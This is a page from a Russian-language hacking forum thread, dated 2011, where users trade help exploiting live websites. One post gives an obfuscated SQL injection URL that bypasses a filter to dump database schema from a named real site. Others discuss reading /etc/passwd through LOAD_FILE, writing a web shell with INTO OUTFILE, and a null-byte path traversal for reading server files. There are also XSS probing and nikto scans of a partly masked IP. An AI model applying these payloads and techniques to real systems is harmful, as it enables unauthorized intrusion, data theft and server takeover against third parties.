HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1737 из 2438 « Первая < 7371237163716871727 1733 1734 1735 1736 1737 1738 1739 1740 1741 1747178718372237 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #17361  
Старый 20.06.2011, 18:54
foozzi
Новичок
Регистрация: 13.04.2010
Сообщений: 0
Провел на форуме:
1350

Репутация: 0
По умолчанию
на сайте в поиске ввожу "/XSS/?> оно мне выдает найдено 0 записей по запросу '\"/XSS/?>'

подставляю еще ' выдает тоже самое только '\'\\\"/XSS/?>' подставляю еще ' выходит '\'\\\'\\\\\\\"/XSS/?>' и после этого когда я подставляю ' выдает результат поиска Оо - первых 20 записей категории

XSS ?
 
Ответить с цитированием

  #17362  
Старый 20.06.2011, 19:38
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию
Цитата:
Сообщение от alexvrn  
alexvrn said:
Код:
Code:
SQL Ошибка для [select id from phpshop_categories where seoname='-3'/**//*!union*//**//*!select*//**/version(),1,2,3,4,5,6--+'' limit 1] 
The used SELECT statements have a different number of columns
-3'/**//*!union*//**//*!select*//**/version(),1,2,3,4,5,6--+'
ты вообще читаешь что оно тебе написало?

select id from phpshop_categories where seoname='-3'/**//*!union*//**//*!select*//**/version(),1,2,3,4,5,6--+'' limit 1
 
Ответить с цитированием

  #17363  
Старый 20.06.2011, 19:41
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию
Цитата:
Сообщение от foozzi  
foozzi said:
на сайте в поиске ввожу "/XSS/?> оно мне выдает найдено 0 записей по запросу '\"/XSS/?>'
подставляю еще ' выдает тоже самое только '\'\\\"/XSS/?>' подставляю еще ' выходит '\'\\\'\\\\\\\"/XSS/?>' и после этого когда я подставляю ' выдает результат поиска Оо - первых 20 записей категории
XSS ?
https://forum.antichat.net/thread104591.html
 
Ответить с цитированием

  #17364  
Старый 20.06.2011, 19:48
foozzi
Новичок
Регистрация: 13.04.2010
Сообщений: 0
Провел на форуме:
1350

Репутация: 0
По умолчанию
есть ли русский фак по nikto 2?

самому сложновато разобраться прописую например perl nikto.pl -h 91.20*.***.94

сканирует только директории и файлы.

Что прописывать например для обнаружения sql или php inj?

(Ubuntu)
 
Ответить с цитированием

  #17365  
Старый 20.06.2011, 20:30
Cybersteger
Познающий
Регистрация: 09.10.2009
Сообщений: 31
Провел на форуме:
287607

Репутация: 19
По умолчанию
Цитата:
Сообщение от kroŧ  
kroŧ said:
Как можно обойти такой фильтр?
http://www.onlymelbourne.com.au/melbourne.php?id=-371/*!UNioN*/SELeCT+1
просто переходит на:
http://www.onlymelbourne.com.au/melbourne.php
Заранее благодарю за любой ответ.
и stasiliy

можна так

Код:
Code:
http://www.onlymelbourne.com.au/melbourne.php?id=371+%61nd+1=0+%75nion+%73elect+(%73elect(@x)%66rom(%73elect(@x:=0x00),(%73elect(null)%66rom(%69nformation_schema.%63olumns)%77here
(%74able_schema!=0x696e666f726d6174696f6e5f736368656d61)%61nd(0x00)%69n
(@x:=%63oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,%63olumn_name))))x)
пс:убрать пробели
 
Ответить с цитированием

  #17366  
Старый 20.06.2011, 22:47
ne0k
Guest
Сообщений: n/a
Провел на форуме:
10960

Репутация: 0
По умолчанию
Доброго времени суток уважаемые,

Есть вопрос:

1. Эксплуатирую одну очень важную blind inj.

Пользователь, из под которого запущена БД привилегированный, т.е. имеет права FILE_PRIV = Y, INSERT_PRIV = Y и тд..

При использовании конструкции

Код:
Code:
SELECT LOAD_FILE('/etc/passwd')
я могу получить список из passwd, и ничего кроме /etc/passwd я прочитать не могу.. Могу ли я читать что нибудь кроме passwd, в той же /etc/ или в любом другом каталоге? Если да, то у меня не выходит.. Читает только /etc/passwd... Может кто нибудь объяснить?

З.Ы: БД, запросы к которой я посылаю, находится на другом серве, т.е. не на том же сервере что сам сайт.

1.1. Возможно ли как нибудь узнать, каков IP адрес у этого сервера с MySQL ?

2. Пытаюсь залить веб шелл, не выходит.

Код:
Code:
SELECT '' FROM mysq.user INTO OUTFILE '/rdb-cluster/sites/somesite.com/htdocs/images/info.php'
АХТУНГ, вопрос: Выполняя запрос на заливку шелла, я указываю веб путь на сервере с MySQL или же тот, где используется сценарий? А если MySQL поднят на машине, где вообще нет веб директорий.. То бишь апачи не поднят.. Я так понимаю про шелл через скулю забыть?

Если же веб путь указывать надо на сервере с апачи, то вот:

FILE_PRIV = Y

Full path взятый из phpinfo самого сайта = /rdb-cluster/sites/somesite.com/htdocs/

По адресу foo.somesite.com/.svn/ я нашел исходники, в которых подключались конфиги с подключением к БД:

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]include([/COLOR][COLOR="#DD0000"]'/data/vhosts/www.somesite.com/htdocs/inc/conf.php'[/COLOR][COLOR="#007700"])[/COLOR][/COLOR
То бишь: /data/vhosts/www.somesite.com/htdocs/

Из файла entries в той же /.svn/, я выдернул следующую запись:

/home/user/websites/foo.somesite.com/ .....

Я немного запутался, и голова идет кругом, подскажите пожалуйста, откуда столько путей? Какой из них "тот самый" ?

С уважением, надеюсь кто нибудь поможет!
 
Ответить с цитированием

  #17367  
Старый 21.06.2011, 01:39
plaeer
Guest
Сообщений: n/a
Провел на форуме:
34360

Репутация: 1
По умолчанию
support/button.php?image=asdasd

Получаю ошибку

Warning: fopen(locales/ru/button/asdasd_off.gif) [function.fopen]: failed to open stream: No such file or directory in [patch]\support\button.php on line 27

no image

Я так понимаю это пхп инекция? Как её заюзать? Сервер на винде.
 
Ответить с цитированием

  #17368  
Старый 21.06.2011, 07:10
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512

Репутация: 0
По умолчанию
Цитата:
Сообщение от plaeer  
plaeer said:
Я так понимаю это пхп инекция?
Нет, это не пхп инъекция.

Можешь использовать для XSS.

Возможно, получится читать файлы на сервере. Например так:

support/button.php?image=../../../../../../../[patch]/support/button.php%00
 
Ответить с цитированием

  #17369  
Старый 21.06.2011, 07:20
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512

Репутация: 0
По умолчанию
ne0k

1. Какие еще файлы ты пытался читать?

1.1. Почитать скрипты, которые обращаются к БД

2. На сервере с MySQL
 
Ответить с цитированием

  #17370  
Старый 21.06.2011, 07:33
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512

Репутация: 0
По умолчанию
Цитата:
Сообщение от kroŧ  
kroŧ said:
Как обойти фильтрацию кавычек при заливки файла?
INTO OUTFILE и INTO DUMPFILE обязательно требуют кавычек. В обычных условиях залить ничего не получится. Но исключения бывают, все зависит от конкретного случая.
 
Ответить с цитированием
Ответ
Страница 1737 из 2438 « Первая < 7371237163716871727 1733 1734 1735 1736 1737 1738 1739 1740 1741 1747178718372237 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ